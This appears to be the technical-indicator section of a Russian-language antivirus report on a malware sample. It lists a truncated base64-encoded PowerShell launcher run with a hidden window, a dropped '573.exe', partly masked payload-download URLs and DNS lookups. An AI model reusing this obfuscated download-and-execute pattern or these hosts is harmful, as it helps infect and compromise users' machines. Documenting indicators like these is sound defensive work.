Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFoATQBKAFgAbgBvAHEAPQAnAFkAVwBQAEQAUABqAGIAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwB1AHIASQB0AFkAUABSAGAAbwB0AGAAbwBDAGAAbwBMACIAIAA9AC...
- %HOMEPATH%\573.exe
- %HOMEPATH%\573.exe
- %HOMEPATH%\573.exe
- http://el####steel-eg.com/admin/nx5ea_v0af_ukpya/
- http://www.ea###path.com/EarthPath/cmr4_oof1y_s/
- http://en##nz.com/zg3lo_dsy_knb1n/
- DNS ASK el####steel-eg.com
- DNS ASK es###.mumara.com
- DNS ASK ea###path.com
- DNS ASK en##nz.com
- DNS ASK er###nooze.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAFoATQBKAFgAbgBvAHEAPQAnAFkAVwBQAEQAUABqAGIAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwB1AHIASQB0AFkAUABSAGAAbwB0AGAAbwBDAGAAbwBMACIAIAA9AC...' (со скрытым окном)